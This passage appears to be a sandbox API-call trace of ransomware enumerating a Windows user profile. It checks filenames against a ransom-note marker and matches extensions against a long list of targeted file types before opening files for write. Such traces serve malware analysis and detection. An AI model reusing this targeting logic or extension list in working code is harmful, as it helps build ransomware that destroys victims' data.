	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb8633609, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb8633609, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb803d629, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb803d629, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf5aa017c, ftLastAccessTime.dwHighDateTime=0x1d97680, ftLastWriteTime.dwLowDateTime=0xf5aa017c, ftLastWriteTime.dwHighDateTime=0x1d97680, nFileSizeHigh=0x0, nFileSizeLow=0x140000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1
	[0180.937] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1
	[0180.937] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1
	[0180.937] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.937] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="NTUSER.DAT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT") returned="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT"
	[0180.937] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT") returned 32
	[0180.937] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.937] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT", cchLength=0x20 | out: lpsz="c:\\users\\rdhj0cnfevzx\\ntuser.dat") returned 0x20
	[0180.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.938] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\ntuser.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.939] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\rdhj0cnfevzx\\ntuser.dat" | out: lpString1="c:\\users\\rdhj0cnfevzx\\ntuser.dat") returned="c:\\users\\rdhj0cnfevzx\\ntuser.dat"
	[0180.939] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\ntuser.dat") returned 32
	[0180.939] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.940] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0180.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.940] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0180.940] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.940] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.941] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\ntuser.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0180.941] CloseHandle (hObject=0xffffffff) returned 1
	[0180.941] CloseHandle (hObject=0xffffffff) returned 1
	[0180.941] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xb3000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1
	[0180.942] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1
	[0180.942] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1
	[0180.942] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.942] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="ntuser.dat.LOG1" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1") returned="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1"
	[0180.942] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1") returned 37
	[0180.942] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.942] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1", cchLength=0x25 | out: lpsz="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log1") returned 0x25
	[0180.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.943] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log1", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.943] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log1" | out: lpString1="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log1") returned="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log1"
	[0180.943] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log1") returned 37
	[0180.943] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.943] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.944] StrStrW (lpFirst=".log1", lpSrch=".") returned=".log1"
	[0180.944] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.944] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".log1") returned 0x0
	[0180.944] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xa2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1
	[0180.944] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1
	[0180.945] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1
